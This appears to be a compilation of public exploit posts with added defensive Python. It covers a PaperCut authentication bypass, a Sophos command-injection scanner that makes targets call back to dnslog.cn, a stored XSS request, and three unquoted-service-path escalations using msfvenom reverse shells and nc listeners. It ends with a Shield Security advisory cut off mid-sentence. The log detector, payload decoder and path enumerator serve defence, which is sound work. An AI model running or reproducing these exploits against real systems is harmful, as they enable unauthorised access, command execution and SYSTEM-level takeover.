<pre><code># Exploit Title: PaperCut NG/MG 22.0.4 - Authentication Bypass<br /># Date: 21 April 2023<br /># Exploit Author: MaanVader<br /># Vendor Homepage: https://www.papercut.com/<br /># Version: 8.0 or later<br /># Tested on: 22.0.4<br /># CVE: CVE-2023-27350<br /><br />import re<br /><br />import requests<br />from bs4 import BeautifulSoup<br /><br /><br />def vuln_version():<br />    ip = input("Enter the ip address: ")<br />    # SetupCompleted is the post-install wizard page. On unpatched builds it is served<br />    # without authentication and the session it creates is accepted by the admin Dashboard.<br />    url = "http://" + ip + ":9191" + "/app?service=page/SetupCompleted"<br />    response = requests.get(url, timeout=10)<br />    soup = BeautifulSoup(response.text, 'html.parser')<br />    text_div = soup.find('div', class_='text')<br />    if text_div is None:<br />        # No setup-page text block came back, so there is no version to read<br />        print('Not Vulnerable')<br />        return<br /><br />    # Search for the first span element containing a version number<br />    version_span = None<br />    for span in text_div.find_all('span'):<br />        if re.match(r'^\d+\.\d+\.\d+$', span.text.strip()):<br />            version_span = span<br />            break<br /><br />    if version_span is None:<br />        print('Not Vulnerable')<br />    else:<br />        version_str = version_span.text.strip()<br />        print('Version:', version_str)<br />        print("Vulnerable version")<br />        print(f"Step 1 visit this url first in your browser: {url}")<br />        print(f"Step 2 visit this url in your browser to bypass the login page : http://{ip}:9191/app?service=page/Dashboard")<br /><br /><br />if __name__ == "__main__":<br />    vuln_version()<br /></code></pre>
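Because the bypass leaves a recognisable two-request trail (SetupCompleted, then Dashboard, with no login in between), a defender can hunt for it in web access logs. The Python below is an added example and is not part of the exploit above or of PaperCut's own code. It assumes Common Log Format lines for the port-9191 web interface (PaperCut's own server log uses a different layout), an assumed login-form path of /app?service=page/Login, and an assumed ten-minute window; the log lines it runs over are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# The two pages the exploit above chains: the setup page creates the session,
# the Dashboard is the first page that should have required a login.
SETUP_PAGE = "/app?service=page/SetupCompleted"
DASHBOARD_PAGE = "/app?service=page/Dashboard"
LOGIN_PAGE = "/app?service=page/Login"   # assumed path of PaperCut's normal login form
WINDOW = timedelta(minutes=10)           # assumed: how long after SetupCompleted a Dashboard hit counts

# Common Log Format; assumed for this example, PaperCut's own server log differs
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample: 10.0.0.5 performs the bypass (and later a stale pair outside the
# window), 10.0.0.9 logs in normally before reaching the Dashboard.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Apr/2023:10:00:01 +0000] "GET /app?service=page/SetupCompleted HTTP/1.1" 200 5120
10.0.0.5 - - [21/Apr/2023:10:00:04 +0000] "GET /app?service=page/Dashboard HTTP/1.1" 200 20480
10.0.0.9 - - [21/Apr/2023:10:05:00 +0000] "GET /app?service=page/Login HTTP/1.1" 200 3000
10.0.0.9 - - [21/Apr/2023:10:05:07 +0000] "POST /app?service=page/Login HTTP/1.1" 302 0
10.0.0.9 - - [21/Apr/2023:10:05:08 +0000] "GET /app?service=page/Dashboard HTTP/1.1" 200 20480
10.0.0.5 - - [21/Apr/2023:11:30:00 +0000] "GET /app?service=page/SetupCompleted HTTP/1.1" 200 5120
10.0.0.5 - - [21/Apr/2023:11:55:00 +0000] "GET /app?service=page/Dashboard HTTP/1.1" 200 20480
"""


def parse_line(line):
    """Split one CLF line into (ip, timestamp, method, path, status), or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))


def find_setup_bypass(log_text):
    """Return {ip: [(setup_time, dashboard_time), ...]} for clients that reached the
    Dashboard within WINDOW of a 200 on SetupCompleted with no login POST in between."""
    hits = defaultdict(list)
    pending = {}   # ip -> time of the most recent unexplained SetupCompleted hit
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, status = rec
        if path == SETUP_PAGE and status == 200:
            pending[ip] = ts
        elif path == LOGIN_PAGE and method == "POST":
            pending.pop(ip, None)       # a real login explains the later Dashboard access
        elif path == DASHBOARD_PAGE and status == 200 and ip in pending:
            if ts - pending[ip] <= WINDOW:
                hits[ip].append((pending[ip], ts))
            del pending[ip]
    return dict(hits)


if __name__ == "__main__":
    for ip, pairs in find_setup_bypass(SAMPLE_LOG).items():
        for setup_ts, dash_ts in pairs:
            print(f"{ip}: SetupCompleted at {setup_ts:%H:%M:%S}, Dashboard at {dash_ts:%H:%M:%S}")
```

The window and the login-POST reset keep a legitimate administrator who happens to revisit the setup page from being flagged; on the sample only 10.0.0.5's first pair is reported.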
<pre><code>#!/bin/bash<br /># Exploit Title: Sophos Web Appliance 4.3.10.4 - Pre-auth command injection<br /># Exploit Author: Behnam Abasi Vanda<br /># Vendor Homepage: https://www.sophos.com<br /># Version: Sophos Web Appliance older than version 4.3.10.4<br /># Tested on: Ubuntu<br /># CVE : CVE-2023-1671<br /># Shodan Dork: title:"Sophos Web Appliance"<br /># Reference : https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce<br /># Reference : https://vulncheck.com/blog/cve-2023-1671-analysis<br />#<br /># Usage: bash CVE-2023-1671.sh targets.txt<br /># Each target is given a fresh dnslog.cn subdomain; a DNS record for that subdomain after<br /># the injected ping means the command ran on the appliance (blind, out-of-band check).<br /><br />TARGET_LIST="$1"<br /><br /># =====================<br />BOLD="\033[1m"<br />RED="\e[1;31m"<br />GREEN="\e[1;32m"<br />YELLOW="\e[1;33m"<br />BLUE="\e[1;34m"<br />NOR="\e[0m"<br /># ====================<br /><br />UA='Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0'<br />sub=""<br />need_new_sub=1   # fetch a subdomain before the first target and again after every hit<br /><br />get_new_subdomain()<br />{<br />    if [ "$need_new_sub" -eq 1 ]; then<br />        echo -e " [+] Trying to get Subdomain $NOR"<br />        rm -f cookie.txt<br />        # dnslog.cn binds the subdomain to the session cookie saved in cookie.txt<br />        sub=$(curl -s -k -c cookie.txt --max-time 15 \<br />            -H "User-Agent: $UA" -H 'Referer: http://www.dnslog.cn/' \<br />            'http://www.dnslog.cn/getdomain.php?t=0' | grep -o '[a-z0-9]*\.dnslog\.cn')<br />        if [ -z "$sub" ]; then<br />            echo -e " [!]$BOLD$RED Could not obtain a dnslog.cn subdomain, aborting $NOR"<br />            exit 1<br />        fi<br />        echo -e " [+]$BOLD$GREEN Subdomain : $sub $NOR"<br />        need_new_sub=0<br />    fi<br />}<br /><br />check_vuln()<br />{<br />    # user_encoded is base64-decoded by the appliance and spliced into a shell command;<br />    # the single quote closes the string and '#' comments out the rest of the line.<br />    # --data-urlencode keeps the '+', '/' and '=' of the base64 intact in the form body.<br />    payload=$(echo -n "';ping $sub -c 3 #" | base64 | tr -d '\n')<br />    curl -s -k -o /dev/null --max-time 20 "https://$1/index.php?c=blocked&action=continue" \<br />        -d "args_reason=filetypewarn&url=$RANDOM&filetype=$RANDOM&user=$RANDOM" \<br />        --data-urlencode "user_encoded=$payload"<br /><br />    # give the ping's DNS lookup time to reach dnslog.cn before polling the records<br />    sleep 5<br />    req=$(curl -s -k -b cookie.txt --max-time 15 \<br />        -H "User-Agent: $UA" -H 'Referer: http://www.dnslog.cn/' \<br />        'http://www.dnslog.cn/getrecords.php?t=0')<br /><br />    # match the exact subdomain so unrelated records or headers mentioning dnslog.cn do not count<br />    if echo "$req" | grep -q "$sub"; then<br />        echo -e " [+]$BOLD $RED https://$1 Vulnerable :D $NOR"<br />        echo "https://$1" >> vulnerable.lst<br />        need_new_sub=1   # this subdomain is burned; get a fresh one for the next target<br />    else<br />        echo -e " [-] https://$1 Not Vulnerable :| $NOR"<br />    fi<br />}<br /><br />echo '<br /><br /> ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗ ██████╗███████╗<br />██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ███║██╔════╝╚════██║<br />██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗╚██║███████╗ ██╔╝<br />██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝ ██║██╔═══██╗ ██╔╝ <br />╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ██║╚██████╔╝ ██║ <br /> ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═╝ ╚═════╝ ╚═╝ <br /> <br />██████╗ ██╗ ██╗ ██████╗ ███████╗██╗ ██╗███╗ ██╗ █████╗ ███╗ ███╗ ██╗ <br />██╔══██╗╚██╗ ██╔╝ ██╔══██╗██╔════╝██║ ██║████╗ ██║██╔══██╗████╗ ████║ ██╗╚██╗ <br />██████╔╝ ╚████╔╝ ██████╔╝█████╗ ███████║██╔██╗ ██║███████║██╔████╔██║ ╚═╝ ██║ <br />██╔══██╗ ╚██╔╝ ██╔══██╗██╔══╝ ██╔══██║██║╚██╗██║██╔══██║██║╚██╔╝██║ ▄█╗ ██║ <br />██████╔╝ ██║ ██████╔╝███████╗██║ ██║██║ ╚████║██║ ██║██║ ╚═╝ ██║ ▀═╝██╔╝ <br />╚═════╝ ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ <br /> <br /> '<br />if test "$#" -ne 1; then<br />    echo " ----------------------------------------------------------------"<br />    echo " [!] please give the target list file : bash CVE-2023-1671.sh targets.txt "<br />    echo " ---------------------------------------------------------------"<br />    exit 1<br />fi<br /><br />rm -f cookie.txt<br />while read -r target; do<br />    [ -z "$target" ] && continue<br />    get_new_subdomain<br />    echo " [~] Checking $target"<br />    check_vuln "$target"<br />done < "$TARGET_LIST"<br />rm -f cookie.txt<br /></code></pre>
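What the script sends is a base64 blob in user_encoded whose decoded value breaks out of a single-quoted shell string. The Python below is an added example, not part of the script above or of Sophos' code: it rebuilds that payload, decodes the parameter from a form body the way a WAF rule or a log review would, and flags shell metacharacters in the result. The request bodies are constructed; the endpoint and parameter names are the ones the script targets.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlencode

# Any of these in the decoded value would alter a shell command it is spliced into
SHELL_META = re.compile(r"""[;&|`$'"\\\n]""")


def build_user_encoded(callback_host):
    """The script's payload: break out of a single-quoted string and run ping."""
    return base64.b64encode(f"';ping {callback_host} -c 3 #".encode()).decode()


def decode_user_encoded(body):
    """Return the decoded user_encoded field of a form body, or None if absent or not base64."""
    values = parse_qs(body, keep_blank_values=True).get("user_encoded")
    if not values:
        return None
    try:
        return base64.b64decode(values[0], validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def inspect_request(path, body):
    """Classify one POST against the blocked-page 'continue' handler the script targets."""
    if "c=blocked" not in path or "action=continue" not in path:
        return "ignore"
    decoded = decode_user_encoded(body)
    if decoded is None:
        return "malformed"
    if SHELL_META.search(decoded):
        return "injection"
    return "benign"


# Constructed sample bodies; urlencode percent-encodes '+' and '=' inside the base64 so
# they survive form parsing (a raw '+' would decode to a space and break the blob)
BENIGN_BODY = urlencode({"args_reason": "filetypewarn", "url": "1", "filetype": "2",
                         "user": "alice", "user_encoded": base64.b64encode(b"alice").decode()})
ATTACK_BODY = urlencode({"args_reason": "filetypewarn", "url": "1", "filetype": "2",
                         "user": "x", "user_encoded": build_user_encoded("abcd1234.dnslog.cn")})

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("attack", ATTACK_BODY)):
        print(label, "->", inspect_request("/index.php?c=blocked&action=continue", body),
              repr(decode_user_encoded(body)))
```

A benign user_encoded decodes to a plain username; the script's decodes to a quote, a semicolon and a command, which is exactly what the metacharacter check keys on.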
<pre><code># Exploit Title: Old Age Home Management System 1.0 - Multi<br /># Date: 4/26/2023<br /># Exploit Author: OR4NG.M4N<br /># Vendor Homepage: https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/<br /># Software Link: https://phpgurukul.com/projects/Old-Age-Home-MS-using-PHP.zip<br /># Version: v1.0<br /><br />Missing authentication: the admin pages below are reachable without logging in, so any record can be deleted by an unauthenticated user:<br /><br />https://localhost/oahms/admin/manage-scdetails.php<br />https://localhost/oahms/admin/manage-services.php<br /><br />Stored XSS: the contact form stores fname, lname and message without escaping, and the script runs wherever the stored entry is rendered. Proof of concept request:<br /><br />POST /oahms/contact.php<br />Host: localhost<br />User-Agent: Safari/123<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: ar,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 207<br />Origin: https://localhost<br />Connection: keep-alive<br />Referer: https://localhost/oahms/contact.php<br />Cookie: PHPSESSID=fvopdb793anmi5j89o8uad8seo<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />fname=<script>alert('or4ng')</script>&lname=<script>alert('or4ng')</script>&phone=6776767667&email=email@email.com&message=<script>alert('or4ng')</script>&submit=Submit <br /></code></pre>
<pre><code>#####################################################################<br /># #<br /># Exploit Title: OCS Inventory NG 2.3.0.0 - Unquoted Service Path #<br /># Date: 2023/04/21 #<br /># Exploit Author: msd0pe #<br /># Vendor Homepage: https://oscinventory-ng.org #<br /># Software Link: https://github.com/OCSInventory-NG/WindowsAgent #<br /># My Github: https://github.com/msd0pe-1 #<br /># Fixed in version 2.3.1.0 #<br /># #<br />#####################################################################<br /><br />OCS Inventory NG Windows Agent: <br />Versions below 2.3.1.0 contain an unquoted service path. The service runs as LocalSystem, so a local user who can write into one of the directories on that path (here C:\Program Files (x86)\) can escalate privileges to SYSTEM.<br /><br />[1] Find the unquoted service path:<br /> > wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """<br /><br /> OCS Inventory Service OCS Inventory Service C:\Program Files (x86)\OCS Inventory Agent\OcsService.exe Auto<br /><br />[2] Get information about the service (BINARY_PATH_NAME is unquoted and SERVICE_START_NAME is LocalSystem):<br /> > sc qc "OCS Inventory Service"<br /><br /> [SC] QueryServiceConfig SUCCESS<br /><br /> SERVICE_NAME: OCS Inventory Service<br /> TYPE : 110 WIN32_OWN_PROCESS (interactive)<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\OCS Inventory Agent\OcsService.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : OCS Inventory Service<br /> DEPENDENCIES : RpcSs<br /> : EventLog<br /> : Winmgmt<br /> : Tcpip<br /> SERVICE_START_NAME : LocalSystem<br /><br />[3] Generate a reverse shell:<br /> > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o OCS.exe<br /><br />[4] Upload the reverse shell as C:\Program Files (x86)\OCS.exe, the name Windows tries for the unquoted "OCS Inventory Agent" segment before the real binary:<br /> > put OCS.exe<br /> > ls<br /> drw-rw-rw- 0 Sat Apr 22 05:20:38 2023 .<br /> drw-rw-rw- 0 Sat Apr 22 05:20:38 2023 ..<br /> drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Common Files<br /> -rw-rw-rw- 174 Sun Jul 24 08:12:38 2022 
desktop.ini<br /> drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Internet Explorer<br /> drw-rw-rw- 0 Sun Jul 24 07:27:06 2022 Microsoft<br /> drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Microsoft.NET<br /> drw-rw-rw- 0 Sat Apr 22 04:51:20 2023 OCS Inventory Agent<br /> -rw-rw-rw- 7168 Sat Apr 22 05:20:38 2023 OCS.exe<br /> drw-rw-rw- 0 Sat Apr 22 03:24:58 2023 Windows Defender<br /> drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Mail<br /> drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Media Player<br /> drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Multimedia Platform<br /> drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows NT<br /> drw-rw-rw- 0 Fri Oct 28 05:25:41 2022 Windows Photo Viewer<br /> drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Portable Devices<br /> drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Sidebar<br /> drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 WindowsPowerShell<br /><br />[5] Start listener<br /> > nc -lvp 4444<br /><br />[6] Restart the service (needs the right to control it) or reboot the machine:<br /> > sc stop "OCS Inventory Service"<br /> > sc start "OCS Inventory Service"<br /><br /> OR<br /><br /> > shutdown /r<br /><br />[7] Enjoy !<br /> 192.168.1.102: inverse host lookup failed: Unknown host<br /> connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309<br /> Microsoft Windows [Version 10.0.19045.2130]<br /> (c) Microsoft Corporation. All rights reserved.<br /><br /> C:\Windows\system32>whoami<br /><br /> nt authority\system<br /><br /></code></pre>
<pre><code>############################################################################<br /># #<br /># Exploit Title: Wondershare Filmora 12.2.9.2233 - Unquoted Service Path #<br /># Date: 2023/04/23 #<br /># Exploit Author: msd0pe #<br /># Vendor Homepage: https://www.wondershare.com #<br /># My Github: https://github.com/msd0pe-1 # <br /># # <br />############################################################################<br /><br />Wondershare Filmora:<br />Versions <= 12.2.9.2233 contain an unquoted service path which allows a local user to escalate privileges to SYSTEM, the account the service runs as. Note that the binary itself lives under the installing user's profile (C:\Users\msd0pe\AppData\Local\...), so a user who can write there could also replace WsNativePushService.exe directly; the unquoted path adds a second drop location, Wondershare.exe, one directory up.<br /><br />[1] Find the unquoted service path:<br /> > wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """<br /><br />Wondershare Native Push Service NativePushService C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe Auto<br /><br />[2] Get information about the service (BINARY_PATH_NAME is unquoted and SERVICE_START_NAME is LocalSystem):<br /> > sc qc "NativePushService"<br /><br /> [SC] QueryServiceConfig SUCCESS<br /><br /> SERVICE_NAME: NativePushService<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Wondershare Native Push Service<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /><br />[3] Generate a reverse shell:<br /> > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o Wondershare.exe<br /><br />[4] Upload the reverse shell as C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare.exe, the name Windows tries for the unquoted "Wondershare NativePush" segment before the real binary:<br /> > put Wondershare.exe<br /> > ls<br /> drw-rw-rw- 0 Sun Apr 23 14:51:47 2023 .<br /> drw-rw-rw- 0 Sun Apr 23 14:51:47 2023 ..<br /> drw-rw-rw- 0 Sun Apr 23 14:36:26 2023 Wondershare Filmora Update<br /> drw-rw-rw- 0 Sun Apr 23 14:37:13 2023 Wondershare NativePush<br /> 
-rw-rw-rw- 7168 Sun Apr 23 14:51:47 2023 Wondershare.exe<br /> drw-rw-rw- 0 Sun Apr 23 13:52:30 2023 WSHelper<br /><br /><br />[5] Start listener<br /> > nc -lvp 4444<br /><br />[6] Restart the service (needs the right to control it) or reboot the machine:<br /> > sc stop "NativePushService"<br /> > sc start "NativePushService"<br /><br /> OR<br /><br /> > shutdown /r<br /><br />[7] Enjoy !<br /> 192.168.1.102: inverse host lookup failed: Unknown host<br /> connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309<br /> Microsoft Windows [Version 10.0.19045.2130]<br /> (c) Microsoft Corporation. All rights reserved.<br /><br /> C:\Windows\system32>whoami<br /><br /> nt authority\system<br /><br /></code></pre>
<pre><code>##########################################################################<br /># #<br /># Exploit Title: Arcsoft PhotoStudio 6.0.0.172 - Unquoted Service Path #<br /># Date: 2023/04/22 #<br /># Exploit Author: msd0pe #<br /># Vendor Homepage: https://www.arcsoft.com/ #<br /># My Github: https://github.com/msd0pe-1 #<br /># #<br />##########################################################################<br /><br />Arcsoft PhotoStudio:<br />Versions <= 6.0.0.172 contain an unquoted service path which allows a local user who can write into C:\Program Files (x86)\ to escalate privileges to SYSTEM, the account the service runs as.<br /><br />[1] Find the unquoted service path:<br /> > wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """<br /><br /> ArcSoft Exchange Service ADExchange C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe Auto<br /><br />[2] Get information about the service (BINARY_PATH_NAME is unquoted and SERVICE_START_NAME is LocalSystem):<br /> > sc qc "ADExchange"<br /><br /> [SC] QueryServiceConfig SUCCESS<br /><br /> SERVICE_NAME: ADExchange<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 0 IGNORE<br /> BINARY_PATH_NAME : C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : ArcSoft Exchange Service<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />[3] Generate a reverse shell:<br /> > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o Common.exe<br /><br />[4] Upload the reverse shell as C:\Program Files (x86)\Common.exe, the name Windows tries for the unquoted "Common Files" segment before the real binary:<br /> > put Common.exe<br /> > ls<br /> drw-rw-rw- 0 Sun Apr 23 04:10:25 2023 .<br /> drw-rw-rw- 0 Sun Apr 23 04:10:25 2023 ..<br /> drw-rw-rw- 0 Sun Apr 23 03:55:37 2023 ArcSoft<br /> drw-rw-rw- 0 Sun Apr 23 03:55:36 2023 Common Files<br /> -rw-rw-rw- 7168 Sun Apr 23 04:10:25 2023 Common.exe<br /> -rw-rw-rw- 174 Sun Jul 24 08:12:38 2022 desktop.ini<br /> drw-rw-rw- 0 Sun Apr 23 03:55:36 2023 
InstallShield Installation Information<br /> drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Internet Explorer<br /> drw-rw-rw- 0 Sun Jul 24 07:27:06 2022 Microsoft<br /> drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Microsoft.NET<br /> drw-rw-rw- 0 Sat Apr 22 05:48:20 2023 Windows Defender<br /> drw-rw-rw- 0 Sat Apr 22 05:46:44 2023 Windows Mail<br /> drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Media Player<br /> drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Multimedia Platform<br /> drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows NT<br /> drw-rw-rw- 0 Fri Oct 28 05:25:41 2022 Windows Photo Viewer<br /> drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Portable Devices<br /> drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Sidebar<br /> drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 WindowsPowerShell<br /><br />[5] Start listener<br /> > nc -lvp 4444<br /><br />[6] Restart the service (needs the right to control it) or reboot the machine:<br /> > sc stop "ADExchange"<br /> > sc start "ADExchange"<br /><br /> OR<br /><br /> > shutdown /r<br /><br />[7] Enjoy !<br /> 192.168.1.102: inverse host lookup failed: Unknown host<br /> connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309<br /> Microsoft Windows [Version 10.0.19045.2130]<br /> (c) Microsoft Corporation. All rights reserved.<br /><br /> C:\Windows\system32>whoami<br /><br /> nt authority\system<br /><br /></code></pre>
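All three unquoted-service-path advisories above (OCS Inventory, Wondershare Filmora, ArcSoft PhotoStudio) rely on the same CreateProcess behaviour: for an unquoted path containing spaces, Windows tries each prefix that ends before a space, with .exe appended, before it reaches the real binary. The Python below is an added example and not the advisories' own code: it enumerates those candidate paths for any service path (the general rule of which each advisory shows one instance), parses sc qc output, and flags whether the binary already sits under a user profile. The sc qc text is constructed after the listings above. One prerequisite the advisories leave implicit: the attacker must be able to write into one of the intermediate directories, and default ACLs on C:\Program Files (x86)\ do not grant that to standard users, so check the directory with icacls before counting on a candidate.

```python
import re

EXE_RE = re.compile(r"\.exe\b", re.I)


def binary_head(path):
    """Strip service arguments: keep everything up to and including the first '.exe'."""
    m = EXE_RE.search(path)
    return path[:m.end()] if m else path


def is_unquoted_with_spaces(path):
    """The condition behind all three advisories: no surrounding quotes and a space
    somewhere in the executable path itself."""
    return not path.startswith('"') and " " in binary_head(path)


def hijack_candidates(path):
    """Executables CreateProcess tries before the real one when the path is unquoted:
    the prefix up to each space, with .exe appended, in the order Windows tries them."""
    if not is_unquoted_with_spaces(path):
        return []
    parts = binary_head(path).split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def parse_sc_qc(text):
    """Turn `sc qc` output into a dict of KEY -> value (continuation lines are skipped)."""
    cfg = {}
    for line in text.splitlines():
        m = re.match(r"^\s*([A-Z_]+)\s*:\s*(.*?)\s*$", line)
        if m:
            cfg[m.group(1)] = m.group(2)
    return cfg


def assess(sc_output):
    """Summarise one service: candidate drop paths, the account it runs as, and whether
    the binary already sits under a user profile (writable without any quoting trick)."""
    cfg = parse_sc_qc(sc_output)
    path = cfg.get("BINARY_PATH_NAME", "")
    return {
        "service": cfg.get("SERVICE_NAME"),
        "runs_as": cfg.get("SERVICE_START_NAME"),
        "unquoted": is_unquoted_with_spaces(path),
        "candidates": hijack_candidates(path),
        "in_user_profile": bool(re.match(r"^[A-Z]:\\Users\\", binary_head(path), re.I)),
    }


# Constructed from the OCS and Filmora listings above (same field layout as `sc qc`)
OCS_SC_QC = """\
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: OCS Inventory Service
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\\Program Files (x86)\\OCS Inventory Agent\\OcsService.exe
        DEPENDENCIES       : RpcSs
                           : EventLog
        SERVICE_START_NAME : LocalSystem
"""
FILMORA_SC_QC = """\
SERVICE_NAME: NativePushService
        TYPE               : 10  WIN32_OWN_PROCESS
        BINARY_PATH_NAME   : C:\\Users\\msd0pe\\AppData\\Local\\Wondershare\\Wondershare NativePush\\WsNativePushService.exe
        SERVICE_START_NAME : LocalSystem
"""

if __name__ == "__main__":
    for sample in (OCS_SC_QC, FILMORA_SC_QC):
        r = assess(sample)
        print(r["service"], "runs as", r["runs_as"], "unquoted:", r["unquoted"],
              "user profile:", r["in_user_profile"])
        for c in r["candidates"]:
            print("   candidate:", c)
```

For the OCS path the candidates are C:\Program.exe, C:\Program Files.exe, C:\Program Files (x86)\OCS.exe and C:\Program Files (x86)\OCS Inventory.exe; the advisory used the third. Service arguments after the executable are ignored, so a path like C:\foo bar\svc.exe -k x yields only C:\foo.exe.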
<pre><code>Description: Shield Security <= 17.0.17 - Unauthenticated Stored Cross-Site Scripting via User-Agent<br /><br />Affected Plugin: Shield Security – Smart Bot Blocking & Intrusion Prevention <br /><br />Plugin Slug: wp-simple-firewall<br /><br />Affected Versions: <= 17.0.17<br /><br />CVE ID: CVE-2023-0992 <br /><br />CVSS Score: 7.2 (High)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N <br /><br />Researcher/s: Ramuel Gall <br /><br />Fully Patched Version: 17.0.18<br /><br />The Shield Security plugin for WordPress is vulnerable to stored Cross-Site Scripting in versions up to, and including, 17.0.17 via the 'User-Agent' header. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.<br /><br />Description: Shield Security <= 17.0.17 - Missing Authorization <br /><br />Affected Plugin: Shield Security – Smart Bot Blocking & Intrusion Prevention <br /><br />Plugin Slug: wp-simple-firewall<br /><br />Affected Versions: <= 17.0.17<br /><br />CVE ID: CVE-2023-0993 <br /><br />CVSS Score: 4.3 (Medium)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N <br /><br />Researcher/s: Ramuel Gall <br /><br />Fully Patched Version: 17.0.18<br /><br />The Shield Security plugin for WordPress is vulnerable to Missing Authorization on the 'edit-theme-plugin-file' AJAX action in versions up to, and including, 17.0.17. This allows authenticated attackers to add arbitrary audit log entries indicating that a theme or plugin has been edited, and is also a vector for Cross-Site Scripting via CVE-2023-0992.<br /><br />Vulnerability Analysis<br /><br />The Shield Security plugin includes a number of features, including an audit log that records certain types of suspicious activity, such as plugin and theme installation, modification, post deletion, and other types of activity that might impact the site. While most of these events require authentication or higher privileges in order to trigger, we found that certain events could be triggered by unauthenticated users. In particular, failed attempts to authenticate using application passwords, new user registrations, and spam activity are among the actions recorded for unauthenticated users.<br /><br />The audit log records metadata about the client that performed the logged activity, including the client’s User-Agent, which can be accessed by clicking the 